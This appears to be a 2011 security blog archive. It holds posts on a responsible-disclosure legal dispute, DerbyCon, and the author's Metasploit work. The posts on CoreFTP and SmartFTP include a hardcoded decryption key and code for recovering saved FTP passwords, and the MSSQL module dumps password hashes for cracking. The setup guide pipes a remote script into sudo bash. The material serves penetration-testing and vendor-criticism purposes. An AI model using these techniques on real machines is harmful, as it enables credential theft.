Cosine Security

Some facts on the First State Superannuation Issue

2011-10-17T06:27:00.000-07:00

Some blogger, has recently written a somewhat uninformed post on the whole Patrick Webster FSS issue. The author seems to be under some misapprehension about how these sorts of things work. Which is cocnerning for someone who claim to be a Web Application Security person, and is taking the pulpit to preach on the issue. Then again, why should we expect anything less from the Internet right?

In his post the author states: " It should go without saying that at this point that he could, just by the actions he had taken up to this point, be in violation of any number of data privacy laws."

Really, goes without saying? Actually it doesn't. Let's take a look. The first statue they claim he is in violation state the following:

308H Unauthorised access to or modification of restricted data held in computer (summary offence)

(1) A person:
(a) who causes any unauthorised access to or modification of restricted data held in a computer, and
(b) who knows that the access or modification is unauthorised, and
(c) who intends to cause that access or modification,
is guilty of an offence.
Maximum penalty: Imprisonment for 2 years.

(2) An offence against this section is a summary offence.
(3) In this section:
restricted data means data held in a computer, being data to which access is restricted by an access control system associated with a function of the computer.

Let's look at the other statute that is referenced:

478.1 Unauthorised access to, or modification of, restricted data
(1) A person is guilty of an offence if:
(a) the person causes any unauthorised access to, or modification of, restricted data; and
(b) the person intends to cause the access or modification; and
(c) the person knows that the access or modification is unauthorised; and
(d) one or more of the following applies:
(i) the restricted data is held in a Commonwealth computer;
(ii) the restricted data is held on behalf of the Commonwealth;
(iii) the access to, or modification of, the restricted data is caused by means of a carriage service.
Penalty: 2 years imprisonment.
(2) Absolute liability applies to paragraph (1)(d).
(3) In this section:
restricted data means data:
(a) held in a computer; and
(b) to which access is restricted by an access control system associated with a function of the computer.

Look closely at (3) in both statues. This can only apply if an access control was circumvented. Insecure Direct Object Reference is not bypassing an Access control. It is a complete lack of an Access Control. I may not be a lawyer, but I suspect that this charge would have a VERY hard time standing up in court.

It really is not hard to look up these statues online. I would suggest that people actually read up on the subject matter. all and all, I would be surprised if this whole matter doesn't blow over. The worst that I suspect will happen is that they make Webster sign that agreement on page 2 of their letter or refuse him any further online access. They could, theoretically, even drop him as a customer I suppose. I doubt any serious legal action will occur, but I could be wrong.

Mr Webster, I am behind you, and i am sure many others are too. Good luck.

When even Responsible Disclosure Fails

2011-10-15T11:24:00.000-07:00

Disclaimer: The opinions expressed in this blog are my own, and do not reflect the views of anyone but myself.

In the latest incident, Patrick Webster of OSI Security, is under threat of legal action. This threat comes after he disclosed a vulnerability to First State Superannuation . The vulnerability was a case of direct Object Reference. By manipulating a GET parameter , Webster was able to access the statements of other customers. The legal threat is based around the idea that Webster violated Australian computer crime laws, and bypassed a security measure. Direct Object reference is not bypassing an access control. It is, by its very nature, the lack of an access control. Webster did not go public with this information, but rather went directly to the company to notify them of the flaw. On one hand, the company thanked him for his help. On the other hand they sicked the police after him and are trying to hold him responsible for the cost of fixing the flaw. Customers of First State Superannuation should be outraged at this. The company, which is responsible for protecting their customers' information has failed to do so. When one of these customers showed this failing, they held him responsible for it. The fact is, FSS has been negligent in providing proper security for their customers. They should be held accountable for this failing. Let's make a hypothetical analogy:

A customer walks into his bank, and asks to access his safety deposit box. They ask him his box number, and he tells them the wrong box number by accident. They bring him another person's box without verifying his identity. When he explains the mistake to them, they call the police and have him arrested.

If you read about this scenario in the newspaper you would be outraged. Why should it be any different in this case?

What is even more deeply disturbing, is the fact that this is far from an isolated incident. In the past year, there have been at least 2 other cases just like this. Earlier this year, a security researched by the handle of Acidgen disclosed a buffer overflow vulnerability to German Software company Magix. Acidgen contacted the company with the information, and had supposedly amiable communication with them. During the course of his conversation, he supplied them with a Proof of Concept that opened up calculator when run. He asked the company to let him know when it would be patched so he could release the details after it had been fixed. This is when Magix began threatening legal action against Acidgen. Among their claims, are the claims that sending the PoC to them constituted distribution of 'hacking tools'. They also claim his intent to release the details after a patch constitutes extortion.

Another example is the PlentyofFish.com dating site hack. Security researchers discovered a vulnerability in the site that allowed access to customers' private data. The researchers claim that they simply informed the operators of the site of the vulnerability. In a bizarre twist, the owner of the site posted a bizarre rambling blog post where he claimed that the researchers attempted to extort him. His story was bizarre in the extreme indicating Russian Mob involvement, extortion, and even originally implicated journalist Brian Krebs in this scheme.

What I see here is a very alarming trend. Companies are trying to redirect all blame for their own failings to the very people who are trying to help make them more secure. If this trend continues, researchers will simply stop practicing responsible disclosure to most of these companies. In some cases the disclosure will go back to Full Disclosure practices. Otherwise, some researchers will just keep silent.

So what would First State Superannuation say if Webster had kept silent. Then a month later someone far less scrupulous exploited this vulnerability to attempt to make a profit. FSS should be thanking Webster for saving them all the embarrassment and possible repercussions of their irresponsible 'security' practices. These companies need to wake up and work with the community to help protect themselves, or things are only going to get worse.

DerbyCon Retrospective

2011-10-09T08:09:00.000-07:00

Rel1k recently posted his thoughts on how DerbyCon, and I thought I would share my own. I have not exactly made a secret of how I felt about DerbyCon. The speaker lineup was simply amazing. There were very few spots where I didn't have a talk I wanted to see. I unfortunately had to make some hard decisions between talks that were going at the same time.

When I go to conferences, I often find myself wandering aimlessly for periods. I'm not interested in the talks that are on at that time, and I don't really have anyone to talk to. So I wander about until I find someone I know. Every time I started to wander at Derbycon, I would run into someone who wanted to talk about something. I had no real "down time" the entire conference.

I spent time hanging out with, or at least talking to, people who have been something of heroes to me. I have followed some of these people for years, and getting to talk to them was great. What was even more amazing was that many of them knew who I was! Shaking hands with Chris Gates for the first time was surreal for me. I have followed Chris since I started in security. I tracked dookie2000ca down and finally got him to sign my copy of Metasploit: A Penetration Tester's Guide.I got to spend time hanging out with jduck, corlanc0der, and sinn3r. Everywhere I went, I felt not jsut like an equal, but like we were all friends. The most telling thing about the Information Security community is that we call it the Community, not the Industry. DerbyCon embodied this spirit. The entire weekend felt more like a family reunion than a conference, and I was sad to leave.

I was privileged to get to take the CoreLan Exploit Dev bootcamp. This training class was intense. We went from 1600-0200 both days, and didn't make it through everything. Peter Van Eeckhoutte (corelanc0d3r), took a class of 30 people from different backgrounds and walked them through windows exploitation. Some people in the class had absolutely no experience in exploitation. Despite this, Peter kept the entire class moving along, and as far as I could tell, nobody was lost. It was a shame that I had to miss parts of the conference for this training, but I would make the same choice again.

Brandon Perry and I wandered into the CTF room out of curiosity at one point. I had no plans to enter the cTF, so I hadn't really brought any tools with me. We decided to start playing around, not to seriously compete, but to have fun. We shared things we found with each other, and were just having a good time. Before we knew it, we were on top of the leaderboard. The organizers came and asked us to either be scored as a team, or to stop working together. I closed my account out and we kept working together under Brandon's. I was tied up with training for most of the conference, so Brandon spent a lot more time on the CTF than I did. In the end, we ended up in 5th place. I think if we had gone in prepared from the start, and I had the time to focus on it, we could have won. See Brandon's writeup on the CTF efforts here.

A few weeks before Derbycon, I started trying to put together a #metasploit meetup. I wanted to get everyone from the metasploit IRC channel together to hang out for a bit, have some drinks and just have fun. Mubix came up with the idea of throwing a birthday party for ms08-067, so the two ideas merged naturally. Mubix got it all organized and pulled off a great event. There was a big cake and we all sang happy birthday. Then HD started handing out Redbull and Vodkas to EVERYONE at the party!

So I have ranted for long enough, I guess. The summary is this: Derbycon was probably one of the best experiences I have had. I felt at home the entire time I was there. The entire weekend made me more certain than ever that I am where I belong doing what I am meant to do. I can't possibly thank everybody enough, but thank you conference organizers, Rel1k, HD, Jduck, Corelanc0der, sinn3r, nullthreat, lincoln, bperry, Red, and everyone else I hung out with this weekend.

Update to the Metasploit Exploit Port Wishlist

2011-10-08T15:42:00.000-07:00

Here is the latest update to the document I have been creating. This is a list of exploits that are in exploit-db but not in Metasploit. This list is generated by referencing the Knowledge Base in QualysGuard. Its accuracy is not guaranteed, but it should serve as a good starting point for anyone interested in porting exploits to Metasploit.

Metasploit: Dumping Microsoft SQL Server Hashes

2011-07-30T15:24:00.000-07:00

New module just committed today: auxiliary/scanner/mssql/mssql_hashdump

This modules takes given credentials and a port and attempts to log into one or more MSSQL Servers. Once it has logged in it will check to make sure it has sysadmin permissions. Assuming it has the needed permissions it will then grab all of the Database Username and Hashes. While it is in there, it will also grab all the Database and Table names. It reports all of this back into the Database for later cracking. Support will be added in the future to the John the Ripper functions to include support for these database hashes. When it does, the database, table names, and instance names will also be sued to seed the JtR wordlists to enhance cracking efforts.

msf auxiliary(mssql_hashdump) > info

Name: MSSQL Password Hashdump
Module: auxiliary/scanner/mssql/mssql_hashdump
Version: 13435
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
TheLightCosine

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD reallybadpassword no The password for the specified username
RHOSTS 192.168.1.1,192.168.1.2 yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification

Description:
This module extracts the usernames and encrypted password hashes
from a MSSQL server and stores them for later cracking. This module
also saves information about the server version and table names,
which can be used to seed the wordlist.

msf auxiliary(mssql_hashdump) >

Metasploit Development Environment In Ubuntu

2011-07-29T10:11:00.000-07:00

I have spent some time today getting a new Metasploit Development Environment in place. With a lot of help from DarkOperator and egyp7 I think I have succeeded.

Step 1: Installing some Pre-Reqs

sudo aptitude install build-essential libssl-dev zlib1g zlib1g-dev subversion openssh-server screen bison flex jam exuberant-ctags libreadline-dev libxml2-dev libxslt-dev libpcap-dev libmysqlclient-dev libpq-dev curl git libsqlite3-dev
Step 2 Installing RVM

sudo bash < <(curl -s https://rvm.beginrescueend.com/install/rvm)
Edit your .bashrc file for each user that will be using RVM:
And add the following lines to the end of it:
# Load RVM source if [[ -s "/usr/local/rvm/scripts/rvm" ]] ; then source "/usr/local/rvm/scripts/rvm" ; fi # Enable Tab Completion in RVM [[ -r /usr/local/rvm//scripts/completion ]] && source /usr/local/rvm/scripts/completion

Then from bash run: source /usr/local/rvm/scripts/rvm

Next we install some necessary packages for rvm:

rvm pkg install zlib
rvm pkg install openssl
rvm pkg install readline

Then we install the ruby versions we want

rvm install 1.9.2 --with-zlib-dir=$rvm_path/usr --with-openssl-dir=$rvm_path/usr --with-readline-path=$rvm_path/usr

rvm 1.9.2 --default

rvm install 1.9.1 --with-zlib-dir=$rvm_path/usr --with-openssl-dir=$rvm_path/usr --with-readline-path=$rvm_path/usr

rvm install 1.8.7 --with-zlib-dir=$rvm_path/usr --with-openssl-dir=$rvm_path/usr --with-readline-path=$rvm_path/usr

Then we install some needed Gems:

rvm gem install --no-rdoc --no-ri wirble pry pg nokogiri mysql sdoc msgpack hpricot sqlite3-ruby

Step 3: Adding DarkOperator's IRB customizations:

Create a file ~/.irbrc

The file should look like this:

puts "Loaded ~/.irbrc"
# Load Lobraries
require 'rubygems'
require 'wirble'
require 'irb/completion' 
# Enable Indentation in irb
IRB.conf[:AUTO_INDENT] = true 
# Enable Syntax Coloring 
Wirble.init
Wirble.colorize 
# get all the methods for an object that aren't basic methods from Object
class Object
def local_methods
(methods - Object.instance_methods).sort
end
end

This customizes irb to give us syntax highlighting, tab completion, auto-indentation, and simple method enumeration.

Step 4: Installing Metasploit:

Metasploit install documentation

Step 5: Running Metasploit:

If you want to run msfconsole with the packaged Ruby, just run 'msfconsole' from bash.

Otherwise select your version like this: rvm 1.8.7

Then call msfconsole with the full path: /opt/metasploit/msf3/msfconsole

That's all there is to it. You are now ready to test your metasploit modules in various different versions of ruby all from the same box.

Once again, thanks to egypt and DarkOperator who provided a lot of this guidance to me.

Book Review: Metasploit a Penetration Tester's Guide

2011-07-26T08:10:00.000-07:00

Earlier this month I picked up Metasploit: A Penetration Tester's Guide. I have, on multiple occasions, had the distinct pleasure to talk with two of the authours, Devon Kearns and Dave Kennedy. These two are shining examples of everything that is right with our industry. They are constantly giving back to the community at large and on an individual basis. They help others and share their knowledge and experience freely without any judgement. This book is just an extension of that behaviour. So enough about them, let's talk about the book.

The book seeks to give a complete overview of the Metasploit framework. This is a herculean task. They no doubt had to make hard decisions about what topics to cover as the most important. All things considered, I think they did an amazing job covering the most important facets. They start off with the basics of the framework: how it's laid out, auxiliary modules, scanners, exploits, getting shell, and what to do once you get a meterpreter session. Then we get to see some of the more advanced aspects, including writing custom fuzzers, developing exploits form scratch, and porting existing exploits into the framework. The book finishes up with a small example penetration test from start to finish. The only topic that they really seemed to skip was the Metasploit WMAP web scanning functionality. Although some Web Application topics were covered through the use of FastTrack.

The way the authours cover the subject matter is excellent. They show you each step, and call your attention to the most improtant parts along the way. It's as close as you can get to demonstration in a book, and it works very well in my opinion. They truly highlight what makes Metasploit great: it's flexibility. they show you how to modify existing modules or write your own. They show how you can use Metasploit in the actual exploit development process as well. Allowing you to birth new exploits completely in the Framework.

I have been using Metasploit since version 2, and I learned new things from this book. Whether it was small things like the SETG command, to some of the more advanced features I have never used before like msfpescan. Whether you are just starting to learn about Penetration Testing or you have been doing it from years, this book is a must read. Unless you are H.D. Moore you will be hard pressed not to get value from this book.

UPDATE: On a note of fairness, Metasploit Unleashed does cover WMAP functionality, even if it did not make it into the book.

Metasploit: Windows User Profile Data

2011-07-23T18:19:00.000-07:00

The Metasploit team as added one of my latest submissions. It is a Mixin for Post modules that allows you to enumerate the user profile information on a windows machine. A lot of the psot modules that I and others have written relied on static values for determining paths for things like the AppData folder. While this worked, it was hardcoded for the English language and didn't account for other possible changes to the system.

The new Msf::Post::Windows::UserProfiles mixin seeks to address this issue by using the registry. Two new Registry functions were added into every layer of Meterpreter: RegLoadKey() and RegUnloadKey(). These two functions, incidentally, should also work from a windows shell session.

The first step is to look in the Registry under HKLM/Software/Microsoft/WindowsNT/CurrentVersion/ProfileList
There are a series of subkeys here for the different SIDs that exist on the machine. When we look at each SID's subkey we will see a value called ProfileImagePath which is the user's root profile directory.

The first function in the mixin is read_profile_list(). This parses this key and all of it's subkeys. While it's doing that it reads through HKU to see which of these hives are already loaded and marks them appropriately.

This lets us know what users we should expect to see on the system, and where we can find their NTUSER.DAT file. If we look at the HKU key in our example, we see only the Administrator hive is currently loaded.

So, next the load_missing_hives() function takes all of the hives not currently loaded, and the paths to their registry hives, and loads each one that it can. Below we see the additional Hives loaded into HKU.

We then call parse_profiles(), which takes each hive and calls parse_profile() on it. This pulls the locations of directories like AppData, My Documents, Local Settingsd etc, and assembles it all. We can see the reg key under the user (HKU//Software/Microsoft/WindowsNT/CurrentVersion/Explorer/ShellFolders)

When we are done parsing this data, we may be done with the registry hives themselves, assuming we were only after filesystem data. Since we are done with the hives, we will want to unload them again to minimize our impact on the system. To do that we call unload_our_hives() This function unloads only the hives that we specifically loaded.

All of these functions are exposed in the mixin, meaning that module writers can use as much or as little of it as they want. However, if the module writer just wants to grab the profile directory data, they can just call grab_user_profiles() . This function will walk through the entire process for them, returning an array of hashes containing all of this data. Below we see an example/test module to demonstrate the UserProfile functionality.

-------------------------------------------

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/user_profiles'

class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::Windows::UserProfiles

def initialize(info={})
super( update_info( info,
'Name' => 'Windows Load Reg Hive Test',
'Description' => %q{ This module exists simply to test
the user profile enuemration mixin},
'License' => MSF_LICENSE,
'Author' => [ 'TheLightCosine '],
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))

end

def run

grab_user_profiles().each do |user|
print_status("***Username: #{user['UserName']} SID: #{user['SID']}***")
print_status("Profile dir: #{user['ProfileDir']} LocalSettings dir: #{user['LocalSettings']}")
print_status("AppData: #{user['AppData']} LocalAppData: #{user['LocalAppData']}")
print_status("History: #{user['History']} Cookies: #{user['Cookies']} Favorites: #{user['Favorites']} ")
print_status("MyDocs: #{user['MyDocs']} Desktop: #{user['Desktop']}")
end

end

end

-------------------------------

Here is what the output of running this test module would look like:

-------------------------------------------------------

meterpreter > run post/windows/gather/hive_test

[*] ***Username: Testuser1 SID: S-1-5-21-1462624396-1657036728-2537704546-1009***
[*] Profile dir: C:\Documents and Settings\Testuser1 LocalSettings dir: C:\Documents and Settings\Testuser1\Local Settings
[*] AppData: C:\Documents and Settings\Testuser1\Application Data LocalAppData: C:\Documents and Settings\Testuser1\Local Settings\Application Data
[*] History: C:\Documents and Settings\Testuser1\Local Settings\History Cookies: C:\Documents and Settings\Testuser1\Cookies Favorites: C:\Documents and Settings\Testuser1\Favorites
[*] MyDocs: C:\Documents and Settings\Testuser1\My Documents Desktop: C:\Documents and Settings\Testuser1\Desktop
[*] ***Username: Testuser2 SID: S-1-5-21-1462624396-1657036728-2537704546-1010***
[*] Profile dir: C:\Documents and Settings\Testuser2 LocalSettings dir: C:\Documents and Settings\Testuser2\Local Settings
[*] AppData: C:\Documents and Settings\Testuser2\Application Data LocalAppData: C:\Documents and Settings\Testuser2\Local Settings\Application Data
[*] History: C:\Documents and Settings\Testuser2\Local Settings\History Cookies: C:\Documents and Settings\Testuser2\Cookies Favorites: C:\Documents and Settings\Testuser2\Favorites
[*] MyDocs: C:\Documents and Settings\Testuser2\My Documents Desktop: C:\Documents and Settings\Testuser2\Desktop
[*] ***Username: Administrator SID: S-1-5-21-1462624396-1657036728-2537704546-500***
[*] Profile dir: C:\Documents and Settings\Administrator LocalSettings dir: C:\Documents and Settings\Administrator\Local Settings
[*] AppData: C:\Documents and Settings\Administrator\Application Data LocalAppData: C:\Documents and Settings\Administrator\Local Settings\Application Data
[*] History: C:\Documents and Settings\Administrator\Local Settings\History Cookies: C:\Documents and Settings\Administrator\Cookies Favorites: C:\Documents and Settings\Administrator\Favorites
[*] MyDocs: C:\Documents and Settings\Administrator\My Documents Desktop: C:\Documents and Settings\Administrator\Desktop

-------------------------------------------------

My latest password extraction module for the SmartFTP client uses this new functionality. I have submitted a patch, that is still pending to implement this functionality across numerous other post modules. Using it to discover profile directories, and in some cases more thoroughly search the registry by loading missing userhives and then unloading them again when done.

All told this should help make these modules able to function more completely on non-English language pack machines, as well as be more thorough in their searching for critical data in the system.

Take away the Tools

2011-07-12T10:38:00.000-07:00

Indi303 recently had a post on twitter

Dear pentester: Throw away metasploit.... are u still a hacker? If you make excuses about why u are,but need it.. you aren't

It seems like a lot of people did not understand what he was saying, which rather proves the point I think. He is not saying that Pen Tester should not use Metasploit, or that tools are bad. What he is saying here is that knowing how to use tools does not make you a good pentester. It makes you a script kiddie. We have been interviewing candidates for two new PenTest positions at my work, and I can tell you I feel this keenly.

During our in-person panel interview we ask a long series of questions designed to gauge depth. We ask a number of basic questions. These first sets of questions we are jsut looking for typical responses. These questions can range from simple things like: "how does traceroute actually work" or "What is ring0" to more complex questions like "How do you exploit Blind SQL Injection on Oracle" or "Name two places besides the saved return pointer that you could overwrite to control program execution". The results we have seen on these questions alone are somewhat disappointing and very mixed.

Then we get to where the wheels always seem to come off. This is where we ask the candidates to actually demonstrate the things they have claimed knowledge of. We ask things like "Write out an HTTP GET request on the whiteboard". Some of you are probably saying to yourselves "That is simple". I would agree, and yet no candidate has done it correctly yet. We draw out a URL with GET parameters and ask them "Rewrite this request with a blind SQL injection attack".

The fact is that when asked to demonstrate these skills and knowledge disciplines outside the context of any sort of tool or crutch. One of my colleagues across the wall, in Incident Response land, has suggested that I am being too harsh. That people who can only use tools still have some value. He is right, as far as it goes. what happens though, when you have secured the environment past the point where you can just run metasploit modules and pop boxes. When you need to find design flaws, or 0days to exploit systems. A click-monkey is of no real value there, except maybe fetching coffee.

none of this means you should throw your tools away. Metasploit is a valuable tool and a framework for pentesting. Those of you who know me, of course know, that when i find something Metasploit doesn't do that I want it to, i try and add it. So while I can operate without Metasploit, and have to often, i try and continually reduce those occurrence by submitting enhancements to Metasploit. In this way I am also giving back to the community. Something i would encourage EVERY pentester to do: If you see something Metasploit should do, but doesn't, write it and submit it!

Or at least open up a feature request on their Redmine interface.

Information Security: Why we Fail

2011-07-07T11:49:00.000-07:00

The very first word seems to be our downfall. Information. If we don't have all of it, we have already failed. So suppose you are in a sizable organisation. Suppose that this organisation has grown inorganically over the years. You have a problem, and that problem is that there is no single authoritative source of information about your environment.

Now as a Security Engineer or Penetration Test how can you protect that environment from compromise? The answer: you can't. At least not until you rectify this problem first. The simple fact that is often overlooked is this: it takes only 1 machine being compromised for the situation to spin out of control. If your knowledge of your environment is incomplete and there are systems your security team is not covering because they don't know it exists, you have failed. It is a matter of when, not if, you suffer a serious breach. you can secure all of those other hosts on the perimeter, and it will amount to nothing. The host with SQLi in that subnet you never knew about will let the attackers in. Then they are on a trusted machine somewhere in your environment, and their possible avenues of attack are countless. Hgiher ups within the organisation will demand answers "Why didn't we catch this problem before? Why are we paying you people".

So here's the point of my rant: If you are an org that is attempting a major Information Security initiative, make sure you equip your security people with the Information they need. If it isn't available, then you need to apply some breaks and fix that problem before anything else.

Identify all of the systems in your environment and where they are. Chances are you're going to find systems that should have been decommed years ago. There is an instant monetary savings for you when you shut them off, as well as a positive step for Security.
Document all of these systems. What they are, who owns them, etc. Keep this documentation up to date going forward
Identify roles and responsibilities of those systems, and segregate portions of your network appropriately. Implement proper access controls between these segregated environments. If you worry about PCI compliance, this is a MUST.
Now set your Security people to work. Deploy Vulnerability Scanning solutions, arrange Penetration Test Engagements, implement an SDLC, etc.

If you try to skip these first three steps, you will fail. I guarantee it.

Stealing CoreFTP Passwords with Metasploit

2011-06-21T12:35:00.000-07:00

Well folks, I'm at it again. The next client to fall is the CoreFTP client. CoreFTP stores it's saved password in the Windows Registry.

They Can be found under HKEY_USERS\\Software\FTPWare\CoreFTP\Sites, with numbered keys for each saved site. The passwords are stored as ascii representations of their hex values(like most of the others we have seen). The ciphertext is encrypted using AES-128-ECB with a static key of "hdfzpysvpzimorhk".

So once again we rely on our ruby openssl implementations to do our decoding for us. First we pack the text from the registry:
cipher =[encoded].pack("H*")
Then we set up our AES implementation:

aes = OpenSSL::Cipher::Cipher.new("AES-128-ECB")
aes.padding = 0
aes.decrypt
aes.key = "hdfzpysvpzimorhk"
password= aes.update(cipher) + aes.final
return password

The import thing to note here is the aes.padding property. This MUST be set to 0 or you will get bad decrypt errors. It took me quite a while to figure that out. The result, as usual, is an easily decrypted password. This once again highlights that static key encryption in a product like this is next to useless. Products that are going to save sensitive passwords should prompt a user to pick a master password, and sue that as an encryption key. This forever separates the encryption key from the software. It's the only real way to keep that data secure.

I submitted this module today, so it should hopefully get committed sometime in next couple of days. Keep your eyes peeled for post/windows/gather/enum_coreftp_passwords.rb

SmartFTP Password Recovery with Metasploit - The details

2011-06-19T10:55:00.000-07:00

So last night I briefly mentioned the new additions I submitted to Metasploit. It looks like they will get merged after the 3.7.2 Release. Metasploit is in a feature freeze at the moment for that release. I wanted to take the opportunity to discuss how the SmartFTP Password recovery module works. It might help other who want to write similar modules in the future.

The Module Can be seen from the Metasploit Website here:

So let's get the simple stuff out of the way first. We pull the OS information and the root System drive information from the Meterpreter stdapi. We then check the OS to see whether we need to be looking for "Documents and Settings" or "Users" off the system root. We then drop into the appropriate users directory and enumerate the individual user Directories. We build the Directory paths based off the combination of all of these factors.

The enum_subdirs function then takes each of these potential SmartFTP data folder paths. If the path does not exist, or we do not have permission to access it, it will throw an exception caught by the rescue statement and will move on to the next path. If it can access the path, then it will enumerate all of the items in that directory. If the item ends in .xml then it is added to the list of XML files to be parsed. If it is not an XML file, it is assumed to be a directory and is recursively passed back to the enum_subdirs function. In the rare case that this item is not actually a directory, it should throw an exception which will still be caught by the rescue. Once everything has been recursively enumerated, we should have a list of xmlfiles in the session array @xmlfiles.

For each xml file in the array we then run get_xml. In get_xml we first try to open the file for reading. If for any reason we cannot do that, we catch an exception let the users know, and move on to the next file. If we can open it, then we read all of the data into memory and send it to the parse_xml function. parse_xml uses the Metasploit rexml library to parse the XML. We pull the host, port, username, and encrypted password. If no encrypted password is found, we skip this item and move to the next one since there is no password to steal. Once we have the encrypted password we pass it to the real meat and potatoes, our decryption routine.

The first thing we do, is unpack this encoded data as a series of hex bytes. The string is in fact a series of bytes. So if the encoded string is "9722972FC57CAE5A78DBD64E23968440C794" then it is actually \x97\x22\x97 etc.

So now let's take a moment to look at the new Railgun function definition I have added. These functions come from Advapi32.dll. This DLL is already defined in Railgun so we just have to add the functions to it's definition:

#Functions for Windows CryptoAPI
railgun.add_function('advapi32', 'CryptAcquireContextW', 'BOOL',[
['PDWORD', 'phProv', 'out'],
['PWCHAR', 'pszContainer', 'in'],
['PWCHAR', 'pszProvider', 'in'],
['DWORD', 'dwProvType', 'in'],
['DWORD', 'dwflags', 'in']])

railgun.add_function('advapi32', 'CryptCreateHash', 'BOOL',[
['LPVOID', 'hProv', 'in'],
['DWORD', 'Algid', 'in'],
['DWORD', 'hKey', 'in'],
['DWORD', 'dwFlags', 'in'],
['PDWORD', 'phHash', 'out']])

railgun.add_function('advapi32', 'CryptHashData', 'BOOL',[
['LPVOID', 'hHash', 'in'],
['PWCHAR', 'pbData', 'in'],
['DWORD', 'dwDataLen', 'in'],
['DWORD', 'dwFlags', 'in']])

railgun.add_function('advapi32', 'CryptDeriveKey', 'BOOL',[
['LPVOID', 'hProv', 'in'],
['DWORD', 'Algid', 'in'],
['LPVOID', 'hBaseData', 'in'],
['DWORD', 'dwFlags', 'in'],
['PDWORD', 'phKey', 'inout']])

railgun.add_function('advapi32', 'CryptDecrypt', 'BOOL',[
['LPVOID', 'hKey', 'in'],
['LPVOID', 'hHash', 'in'],
['BOOL', 'Final', 'in'],
['DWORD', 'dwFlags', 'in'],
['PBLOB', 'pbData', 'inout'],
['PDWORD', 'pdwDataLen', 'inout']])

railgun.add_function('advapi32', 'CryptDestroyHash', 'BOOL',[
['LPVOID', 'hHash', 'in']])

railgun.add_function('advapi32', 'CryptDestroyKey', 'BOOL',[
['LPVOID', 'hKey', 'in']])

railgun.add_function('advapi32', 'CryptReleaseContext', 'BOOL',[
['LPVOID', 'hProv', 'in'],
['DWORD', 'dwFlags', 'in']])

There is a lot going on here. So we'll take it a little slow.
For those who don't know, Railgun is a part of Meterpreter that allows a user to hook Windows libraries and access their functions. In this case we are hooking the Advapi32.dll to gain access to the Windows CryptoAPI(CAPI) functions.

CryptAcquireContextW is the Unicode version of the AcquireContext function. This creates the Cryptographic context we will be working in. The first parameter is a pointer to the provider object. the provider object is, in of itself, a pointer to a data structure that will be initialised by this function. So we pass it a pointer to a DWORD for the pointer to be placed in, and set it as an out parameter so the function will return the pointer information to us. We are not using the container object in this case, so we pass it nil. We then tell it what provider to use in this case it is the Microsoft Enhanced Cryptographic Provider. This is passed as a pointer to a string. We then pass it a value to tell it what type of provider to use. WinCrypt.h normally provides Constants for this, but since we don't have access to those constants we pass it the raw numerical value of that constant. In this case we are passing it the value for the RSA_FULL provider. Finally we pass it the appropriate flags. Like the provider type this expects a constant so we need to pass it a numerical value. We pass it CRYPT_VERIFY_CONTEXT(0xF0000000). For more details on the available flags I suggest you look at the MSDN Doc.

CryptCreateHash creates a hash object for us to user in much the same way that AcquireContext created a provider object. We pass it the provider object as the first parameter. Remembering that this object is a pointer to an abstracted in-memory data structure. Then we pass it the algorithm id for what kind of hash algorithm we will be using. Again, this is typically expecting a constant we don't have so we pass it a numerical value. If this hashing algorithm is expecting a key we pass it a key object. Since we are using md5 we pass it a 0 to tell it we are not using a key. We pass it a 0 for the flags. Finally we pass it a pointer to a place in memory for it to store the hash object. Just like the provider object, this is actually a pointer to a memory structure intialised by this function.

CryptHashData is what will actually create the hash for us and put it in the hash object. The first thing we do is pass it our hash object. We then pass it the data to be hashed. In this case we are hashing the string "SmartFTP". We then pass it the data length of 16, and again we pass it no flags with a 0. This is the first step to deriving our Encryption Key.

CryptDeriveKey is going to take our hash and derive an encryption key from it. We pass it our provider object, an integer value for our encryption algorithm(RC4), the Hash object, our flag, and a pointer to a key object. This key object works the same way as the hash and provider objects did before it. The function derives an RC4 key for us and puts it in the memory structure pointed to by our key object.

CryptDecrypt is where the magic finally happens. We pass it our key object as the first parameter. If the data was to be decrypted and hashed at the same time we would pass it a hash object. Since we do not want to hash the results we pass it a 0. The next parameter is whether this is the final section to be decrypted. We pass this a value as true. We pass no flags, and a pointer to the data to be decrypted. Finally we pass it the length of the data to be decrypted.

The remaining three functions are eseentialy just garbage collection. They close out the memory structures we initalised along the way.

Some of the parameters in these function calls are still not set up in the most ideal fashion. One of the big tricks to remember is that in the end, a pointer is just a number. So even though ruby has no pointer, just treat them as a numbers and pass them back to LPVOIDS. I will be smoothing out any wrinkles in these function defs soon, and adding the other CAPI functions that I didn't need for this particular module.

Once the decryption is complete. The module displays the results back to the console. It also reports the data back to the backend database. This means the credentials will be stored for the target machines. If you use MetaSploit Pro (which if you are a professional Penetration Tester, I cannot recommend it enough) this will be especially useful. If the remote machines are in your project scope, those credentials will show up in the host information, and can be used for further module usage.

So there you have it. I hope you find this detailed breakdown useful and/or informative. Stay tuned for further updates and developments. I am continuing on my goal of making it into the Metasploit.com Top contributors list, but I suspect I still have a ways to go.

Windows Cryptography with Metasploit and SmartFTP Password Recovery

2011-06-18T19:06:00.000-07:00

I have submitted two new additions to Metasploit tonight. The first is a series of function definitions for Railgun. These functions are some of the core Windows CryptoAPI functions. It is not a complete list yet. I only added the ones i needed to complete the other piece I'll tell you about in a minute. I will be working voer the next week to get all of the other CAPI functions defined within Metasploit Railgun. In addition to that, I will try to write a library that will server as an abstraction layer for these function calls. This library will wrap the Windows CAPI Functions as well as serve up alot of the same constants provided by the WinCrypt.h header file. I hope that this will make it easier for other module writers to make use of the windows CryptoAPI whenever they may need it in a Post Module.

The second bit of business is what actually spawned this work. I have submitted a module for Extracting/Recovering saved Passwords from the SmartFTP Client. Like the other modules I have submitted, it finds the passwords saved by users, decrypts them and reports them back to the backend database as well as to the display screen.

I want to take a moment to especially thank jduck and chao-mu who helped me talk through some things while I was working on this. As always the support of the community in the #metasploit IRC channel is amazing.

Metasploit Activities

2011-06-16T09:09:00.000-07:00

Well, i know i have been pretty quiet lately, so I thought i'd provide an update. I am very tempted to try and stake a claim on one of the Metasploit bounties , but I don't think I'm quite up to that challenge yet. Instead i will continue to work on some of my other Metasploit Projects:

